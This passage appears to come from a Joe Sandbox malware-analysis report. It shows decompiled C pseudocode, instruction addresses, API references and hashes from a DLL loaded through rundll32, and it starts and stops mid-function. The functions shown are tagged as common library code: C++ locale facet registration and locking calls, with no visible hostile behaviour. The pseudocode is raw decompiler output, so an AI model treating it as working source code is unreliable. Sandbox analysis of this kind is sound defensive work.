																		__eflags = E6E21C1A4(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t330 - 0x20);
																			E6E223D74(_t330 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t234, _t311, _t319, 0x14);
																			E6E206653(_t330 - 0x14, 0);
																			_t320 =  *0x6e2c6e40; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1E161C(0x6e2c6e20);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E2066BA(_t330 - 0x14);
																				return E6E220075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E21C229(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t330 - 0x20);
																						E6E223D74(_t330 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t234, _t312, _t320, 0x14);
																						E6E206653(_t330 - 0x14, 0);
																						_t321 =  *0x6e2c6e44; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1E161C(0x6e2c6e24);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E2066BA(_t330 - 0x14);
																							return E6E220075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E21C295(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1E1438(_t283);
																									E6E223D74(_t330 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e26851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e26c414;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E21D028(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E220075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E206FD3(__eflags, _t313);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e2c6e44 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E206FD3(__eflags, _t312);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e2c6e40 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E206FD3(__eflags, _t311);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e2c6e38 = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E206FD3(__eflags, _t310);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e2c6e3c = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E206FD3(__eflags, _t309);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e2c6e34 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E206FD3(__eflags, _t308);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e2c6e30 = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E206FD3(__eflags, _t307);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e2c6e2c = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}



























                          0x6e21b7f2
                          0x6e21b7f2
                          0x6e21b7f9
                          0x6e21b803
                          0x6e21b808
                          0x6e21b813
                          0x6e21b817
                          0x6e21b81a
                          0x6e21b81f
                          0x6e21b823
                          0x6e21b828
                          0x6e21b82c
                          0x6e21b871
                          0x6e21b874
                          0x6e21b880
                          0x6e21b82e
                          0x6e21b830
                          0x6e21b836
                          0x6e21b83c
                          0x6e21b844
                          0x6e21b847
                          0x6e21b884
                          0x6e21b892
                          0x6e21b897
                          0x6e21b89f
                          0x6e21b8a9
                          0x6e21b8ae
                          0x6e21b8b9
                          0x6e21b8bd
                          0x6e21b8c0
                          0x6e21b8c5
                          0x6e21b8ce
                          0x6e21b8d0
                          0x6e21b8d2
                          0x6e21b917
                          0x6e21b91a
                          0x6e21b926
                          0x6e21b8d4
                          0x6e21b8d4
                          0x6e21b8d6
                          0x6e21b8dc
                          0x6e21b8e2
                          0x6e21b8ea
                          0x6e21b8ed
                          0x6e21b92a
                          0x6e21b938
                          0x6e21b93d
                          0x6e21b945
                          0x6e21b94f
                          0x6e21b954
                          0x6e21b95f
                          0x6e21b963
                          0x6e21b966
                          0x6e21b96b
                          0x6e21b974
                          0x6e21b976
                          0x6e21b978
                          0x6e21b9bd
                          0x6e21b9c0
                          0x6e21b9cc
                          0x6e21b97a
                          0x6e21b97a
                          0x6e21b97c
                          0x6e21b982
                          0x6e21b988
                          0x6e21b990
                          0x6e21b993
                          0x6e21b9d0
                          0x6e21b9de
                          0x6e21b9e3
                          0x6e21b9eb
                          0x6e21b9f5
                          0x6e21b9fa
                          0x6e21ba05
                          0x6e21ba09
                          0x6e21ba0c
                          0x6e21ba11
                          0x6e21ba1a
                          0x6e21ba1c
                          0x6e21ba1e
                          0x6e21ba63
                          0x6e21ba66
                          0x6e21ba72
                          0x6e21ba20
                          0x6e21ba20
                          0x6e21ba22
                          0x6e21ba28
                          0x6e21ba2e
                          0x6e21ba36
                          0x6e21ba39
                          0x6e21ba76
                          0x6e21ba84
                          0x6e21ba89
                          0x6e21ba91
                          0x6e21ba9b
                          0x6e21baa0
                          0x6e21baab
                          0x6e21baaf
                          0x6e21bab2
                          0x6e21bab7
                          0x6e21bac0
                          0x6e21bac2
                          0x6e21bac4
                          0x6e21bb09
                          0x6e21bb0c
                          0x6e21bb18
                          0x6e21bac6
                          0x6e21bac6
                          0x6e21bac8
                          0x6e21bace
                          0x6e21bad4
                          0x6e21badc
                          0x6e21badf
                          0x6e21bb1c
                          0x6e21bb2a
                          0x6e21bb2f
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb66
                          0x6e21bb68
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e
                          0x6e21bae1
                          0x6e21bae1
                          0x6e21bae4
                          0x6e21bae8
                          0x6e21baec
                          0x6e21baf9
                          0x6e21bb01
                          0x6e21bb03
                          0x00000000
                          0x6e21bb03
                          0x6e21baca
                          0x6e21baca
                          0x00000000
                          0x6e21baca
                          0x6e21bac8
                          0x6e21ba3b
                          0x6e21ba3b
                          0x6e21ba3e
                          0x6e21ba42
                          0x6e21ba46
                          0x6e21ba53
                          0x6e21ba5b
                          0x6e21ba5d
                          0x00000000
                          0x6e21ba5d
                          0x6e21ba24
                          0x6e21ba24
                          0x00000000
                          0x6e21ba24
                          0x6e21ba22
                          0x6e21b995
                          0x6e21b995
                          0x6e21b998
                          0x6e21b99c
                          0x6e21b9a0
                          0x6e21b9ad
                          0x6e21b9b5
                          0x6e21b9b7
                          0x00000000
                          0x6e21b9b7
                          0x6e21b97e
                          0x6e21b97e
                          0x00000000
                          0x6e21b97e
                          0x6e21b97c
                          0x6e21b8ef
                          0x6e21b8ef
                          0x6e21b8f2
                          0x6e21b8f6
                          0x6e21b8fa
                          0x6e21b907
                          0x6e21b90f
                          0x6e21b911
                          0x00000000
                          0x6e21b911
                          0x6e21b8d8
                          0x6e21b8d8
                          0x00000000
                          0x6e21b8d8
                          0x6e21b8d6
                          0x6e21b849
                          0x6e21b849
                          0x6e21b84c
                          0x6e21b850
                          0x6e21b854
                          0x6e21b861
                          0x6e21b869
                          0x6e21b86b
                          0x00000000
                          0x6e21b86b
                          0x6e21b832
                          0x6e21b832
                          0x00000000
                          0x6e21b832
                          0x6e21b830

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21B7F9
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21B803
                          • int.LIBCPMT ref: 6E21B81A
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • messages.LIBCPMT ref: 6E21B83D
                          • std::_Facet_Register.LIBCPMT ref: 6E21B854
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21B874
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21B892
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
                          • String ID:
                          • API String ID: 438560357-0
                          • Opcode ID: 89acaaeb718a5b99678f8af303aeaa38c7a4077168950041d33c9beefdaed25c
                          • Instruction ID: fa31074f765baaf55ad792064010492f97346163ee0330b65fad62241eb71be0
                          • Opcode Fuzzy Hash: 89acaaeb718a5b99678f8af303aeaa38c7a4077168950041d33c9beefdaed25c
                          • Instruction Fuzzy Hash: 8311E079D0451ECBCF00EBE4C894AEDB7BBBF48B18F150919E510AB390DBB49A44CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F567, Relevance: 10.6, APIs: 7, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F567(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t181;
				signed int _t182;
				void* _t194;
				void* _t207;
				void* _t220;
				void* _t233;
				void* _t246;
				void* _t259;
				void* _t272;
				void* _t285;
				void* _t298;
				void* _t311;
				void* _t324;
				signed int _t473;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				void* _t550;

				_t510 = __edx;
				_t389 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t550 - 0x14, 0);
				_t525 =  *0x6e2c6df8; // 0x0
				 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
				 *(_t550 - 0x10) = _t525;
				_t181 = E6E1E161C(0x6e2c6da4);
				_t392 =  *((intOrPtr*)(_t550 + 8));
				_t182 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t181);
				_t512 = _t182;
				if(_t182 != 0) {
					L5:
					E6E2066BA(_t550 - 0x14);
					return E6E220075(_t512);
				} else {
					if(_t525 == 0) {
						_push( *((intOrPtr*)(_t550 + 8)));
						_push(_t550 - 0x10);
						__eflags = E6E211127(__ebx, _t392, __edx, _t512, _t525) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t550 - 0x20);
							E6E223D74(_t550 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t512, _t525, 0x14);
							E6E206653(_t550 - 0x14, 0);
							_t526 =  *0x6e2c6df4; // 0x0
							 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
							 *(_t550 - 0x10) = _t526;
							_t194 = E6E1E161C(0x6e2c6da0);
							_t399 =  *((intOrPtr*)(_t550 + 8));
							_t513 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t194);
							__eflags = _t513;
							if(_t513 != 0) {
								L12:
								E6E2066BA(_t550 - 0x14);
								return E6E220075(_t513);
							} else {
								__eflags = _t526;
								if(_t526 == 0) {
									_push( *((intOrPtr*)(_t550 + 8)));
									_push(_t550 - 0x10);
									__eflags = E6E2111AB(_t389, _t399, __edx, _t513, _t526) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t550 - 0x20);
										E6E223D74(_t550 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t389, _t513, _t526, 0x14);
										E6E206653(_t550 - 0x14, 0);
										_t527 =  *0x6e2c6dc8; // 0x0
										 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
										 *(_t550 - 0x10) = _t527;
										_t207 = E6E1E161C(0x6e2c6d7c);
										_t406 =  *((intOrPtr*)(_t550 + 8));
										_t514 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t207);
										__eflags = _t514;
										if(_t514 != 0) {
											L19:
											E6E2066BA(_t550 - 0x14);
											return E6E220075(_t514);
										} else {
											__eflags = _t527;
											if(_t527 == 0) {
												_push( *((intOrPtr*)(_t550 + 8)));
												_push(_t550 - 0x10);
												__eflags = E6E211230(_t389, _t406, __edx, _t514, _t527) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t550 - 0x20);
													E6E223D74(_t550 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t389, _t514, _t527, 0x14);
													E6E206653(_t550 - 0x14, 0);
													_t528 =  *0x6e2c6dc4; // 0x0
													 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
													 *(_t550 - 0x10) = _t528;
													_t220 = E6E1E161C(0x6e2c6d78);
													_t413 =  *((intOrPtr*)(_t550 + 8));
													_t515 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t220);
													__eflags = _t515;
													if(_t515 != 0) {
														L26:
														E6E2066BA(_t550 - 0x14);
														return E6E220075(_t515);
													} else {
														__eflags = _t528;
														if(_t528 == 0) {
															_push( *((intOrPtr*)(_t550 + 8)));
															_push(_t550 - 0x10);
															__eflags = E6E2112B4(_t389, _t413, _t510, _t515, _t528) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t550 - 0x20);
																E6E223D74(_t550 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t389, _t515, _t528, 0x14);
																E6E206653(_t550 - 0x14, 0);
																_t529 =  *0x6e2c6dd8; // 0x0
																 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																 *(_t550 - 0x10) = _t529;
																_t233 = E6E1E161C(0x6e2c6d84);
																_t420 =  *((intOrPtr*)(_t550 + 8));
																_t516 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t233);
																__eflags = _t516;
																if(_t516 != 0) {
																	L33:
																	E6E2066BA(_t550 - 0x14);
																	return E6E220075(_t516);
																} else {
																	__eflags = _t529;
																	if(_t529 == 0) {
																		_push( *((intOrPtr*)(_t550 + 8)));
																		_push(_t550 - 0x10);
																		__eflags = E6E211339(_t389, _t420, _t510, _t516, _t529) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t550 - 0x20);
																			E6E223D74(_t550 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t389, _t516, _t529, 0x14);
																			E6E206653(_t550 - 0x14, 0);
																			_t530 =  *0x6e2c6db0; // 0x0
																			 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																			 *(_t550 - 0x10) = _t530;
																			_t246 = E6E1E161C(0x6e2c6d64);
																			_t427 =  *((intOrPtr*)(_t550 + 8));
																			_t517 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t246);
																			__eflags = _t517;
																			if(_t517 != 0) {
																				L40:
																				E6E2066BA(_t550 - 0x14);
																				return E6E220075(_t517);
																			} else {
																				__eflags = _t530;
																				if(_t530 == 0) {
																					_push( *((intOrPtr*)(_t550 + 8)));
																					_push(_t550 - 0x10);
																					__eflags = E6E2113A1(_t389, _t427, _t510, _t517, _t530) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t550 - 0x20);
																						E6E223D74(_t550 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t389, _t517, _t530, 0x14);
																						E6E206653(_t550 - 0x14, 0);
																						_t531 =  *0x6e2c6ddc; // 0x0
																						 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																						 *(_t550 - 0x10) = _t531;
																						_t259 = E6E1E161C(0x6e2c6d88);
																						_t434 =  *((intOrPtr*)(_t550 + 8));
																						_t518 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t259);
																						__eflags = _t518;
																						if(_t518 != 0) {
																							L47:
																							E6E2066BA(_t550 - 0x14);
																							return E6E220075(_t518);
																						} else {
																							__eflags = _t531;
																							if(_t531 == 0) {
																								_push( *((intOrPtr*)(_t550 + 8)));
																								_push(_t550 - 0x10);
																								__eflags = E6E211409(_t389, _t434, _t510, _t518, _t531) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t550 - 0x20);
																									E6E223D74(_t550 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t389, _t518, _t531, 0x14);
																									E6E206653(_t550 - 0x14, 0);
																									_t532 =  *0x6e2c6de0; // 0x0
																									 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																									 *(_t550 - 0x10) = _t532;
																									_t272 = E6E1E161C(0x6e2c6d8c);
																									_t441 =  *((intOrPtr*)(_t550 + 8));
																									_t519 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t272);
																									__eflags = _t519;
																									if(_t519 != 0) {
																										L54:
																										E6E2066BA(_t550 - 0x14);
																										return E6E220075(_t519);
																									} else {
																										__eflags = _t532;
																										if(_t532 == 0) {
																											_push( *((intOrPtr*)(_t550 + 8)));
																											_push(_t550 - 0x10);
																											__eflags = E6E211471(_t389, _t441, _t510, _t519, _t532) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t550 - 0x20);
																												E6E223D74(_t550 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t389, _t519, _t532, 0x14);
																												E6E206653(_t550 - 0x14, 0);
																												_t533 =  *0x6e2c6dfc; // 0x0
																												 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																												 *(_t550 - 0x10) = _t533;
																												_t285 = E6E1E161C(0x6e2c6da8);
																												_t448 =  *((intOrPtr*)(_t550 + 8));
																												_t520 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t285);
																												__eflags = _t520;
																												if(_t520 != 0) {
																													L61:
																													E6E2066BA(_t550 - 0x14);
																													return E6E220075(_t520);
																												} else {
																													__eflags = _t533;
																													if(_t533 == 0) {
																														_push( *((intOrPtr*)(_t550 + 8)));
																														_push(_t550 - 0x10);
																														__eflags = E6E2114EC(_t389, _t448, _t510, _t520, _t533) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t550 - 0x20);
																															E6E223D74(_t550 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t389, _t520, _t533, 0x14);
																															E6E206653(_t550 - 0x14, 0);
																															_t534 =  *0x6e2c6dcc; // 0x0
																															 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																															 *(_t550 - 0x10) = _t534;
																															_t298 = E6E1E161C(0x6e2c6d80);
																															_t455 =  *((intOrPtr*)(_t550 + 8));
																															_t521 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t298);
																															__eflags = _t521;
																															if(_t521 != 0) {
																																L68:
																																E6E2066BA(_t550 - 0x14);
																																return E6E220075(_t521);
																															} else {
																																__eflags = _t534;
																																if(_t534 == 0) {
																																	_push( *((intOrPtr*)(_t550 + 8)));
																																	_push(_t550 - 0x10);
																																	__eflags = E6E211558(_t389, _t455, _t510, _t521, _t534) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t550 - 0x20);
																																		E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t389, _t521, _t534, 0x14);
																																		E6E206653(_t550 - 0x14, 0);
																																		_t535 =  *0x6e2c6e00; // 0x0
																																		 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																		 *(_t550 - 0x10) = _t535;
																																		_t311 = E6E1E161C(0x6e2c6dac);
																																		_t462 =  *((intOrPtr*)(_t550 + 8));
																																		_t522 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t311);
																																		__eflags = _t522;
																																		if(_t522 != 0) {
																																			L75:
																																			E6E2066BA(_t550 - 0x14);
																																			return E6E220075(_t522);
																																		} else {
																																			__eflags = _t535;
																																			if(_t535 == 0) {
																																				_push( *((intOrPtr*)(_t550 + 8)));
																																				_push(_t550 - 0x10);
																																				__eflags = E6E2115C4(_t389, _t462, _t510, _t522, _t535) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t550 - 0x20);
																																					E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t389, _t522, _t535, 0x14);
																																					E6E206653(_t550 - 0x14, 0);
																																					_t536 =  *0x6e2c6dd0; // 0x0
																																					 *(_t550 - 4) =  *(_t550 - 4) & 0x00000000;
																																					 *(_t550 - 0x10) = _t536;
																																					_t324 = E6E1E161C(0x6e2c6d60);
																																					_t469 =  *((intOrPtr*)(_t550 + 8));
																																					_t523 = E6E1E171B( *((intOrPtr*)(_t550 + 8)), _t324);
																																					__eflags = _t523;
																																					if(_t523 != 0) {
																																						L82:
																																						E6E2066BA(_t550 - 0x14);
																																						return E6E220075(_t523);
																																					} else {
																																						__eflags = _t536;
																																						if(_t536 == 0) {
																																							_push( *((intOrPtr*)(_t550 + 8)));
																																							_push(_t550 - 0x10);
																																							__eflags = E6E21162A(_t389, _t469, _t510, _t523, _t536) - 0xffffffff;
																																							if(__eflags == 0) {
																																								_t473 = _t550 - 0x20;
																																								E6E1E1438(_t473);
																																								E6E223D74(_t550 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e26851f, _t389, _t523, _t536, 4);
																																								_t537 = _t473;
																																								 *(_t550 - 0x10) = _t537;
																																								 *((intOrPtr*)(_t537 + 4)) =  *((intOrPtr*)(_t550 + 0xc));
																																								_push( *((intOrPtr*)(_t550 + 0x14)));
																																								_t175 = _t550 - 4;
																																								 *_t175 =  *(_t550 - 4) & 0x00000000;
																																								__eflags =  *_t175;
																																								 *_t537 = 0x6e26c0c4;
																																								 *((char*)(_t537 + 0x28)) =  *((intOrPtr*)(_t550 + 0x10));
																																								E6E21542F(_t389, _t473, _t510, _t523, _t537,  *_t175);
																																								return E6E220075(_t537,  *((intOrPtr*)(_t550 + 8)));
																																							} else {
																																								_t523 =  *(_t550 - 0x10);
																																								 *(_t550 - 0x10) = _t523;
																																								 *(_t550 - 4) = 1;
																																								E6E206FD3(__eflags, _t523);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t523 + 4))))();
																																								 *0x6e2c6dd0 = _t523;
																																								goto L82;
																																							}
																																						} else {
																																							_t523 = _t536;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t522 =  *(_t550 - 0x10);
																																					 *(_t550 - 0x10) = _t522;
																																					 *(_t550 - 4) = 1;
																																					E6E206FD3(__eflags, _t522);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t522 + 4))))();
																																					 *0x6e2c6e00 = _t522;
																																					goto L75;
																																				}
																																			} else {
																																				_t522 = _t535;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t521 =  *(_t550 - 0x10);
																																		 *(_t550 - 0x10) = _t521;
																																		 *(_t550 - 4) = 1;
																																		E6E206FD3(__eflags, _t521);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t521 + 4))))();
																																		 *0x6e2c6dcc = _t521;
																																		goto L68;
																																	}
																																} else {
																																	_t521 = _t534;
																																	goto L68;
																																}
																															}
																														} else {
																															_t520 =  *(_t550 - 0x10);
																															 *(_t550 - 0x10) = _t520;
																															 *(_t550 - 4) = 1;
																															E6E206FD3(__eflags, _t520);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t520 + 4))))();
																															 *0x6e2c6dfc = _t520;
																															goto L61;
																														}
																													} else {
																														_t520 = _t533;
																														goto L61;
																													}
																												}
																											} else {
																												_t519 =  *(_t550 - 0x10);
																												 *(_t550 - 0x10) = _t519;
																												 *(_t550 - 4) = 1;
																												E6E206FD3(__eflags, _t519);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t519 + 4))))();
																												 *0x6e2c6de0 = _t519;
																												goto L54;
																											}
																										} else {
																											_t519 = _t532;
																											goto L54;
																										}
																									}
																								} else {
																									_t518 =  *(_t550 - 0x10);
																									 *(_t550 - 0x10) = _t518;
																									 *(_t550 - 4) = 1;
																									E6E206FD3(__eflags, _t518);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t518 + 4))))();
																									 *0x6e2c6ddc = _t518;
																									goto L47;
																								}
																							} else {
																								_t518 = _t531;
																								goto L47;
																							}
																						}
																					} else {
																						_t517 =  *(_t550 - 0x10);
																						 *(_t550 - 0x10) = _t517;
																						 *(_t550 - 4) = 1;
																						E6E206FD3(__eflags, _t517);
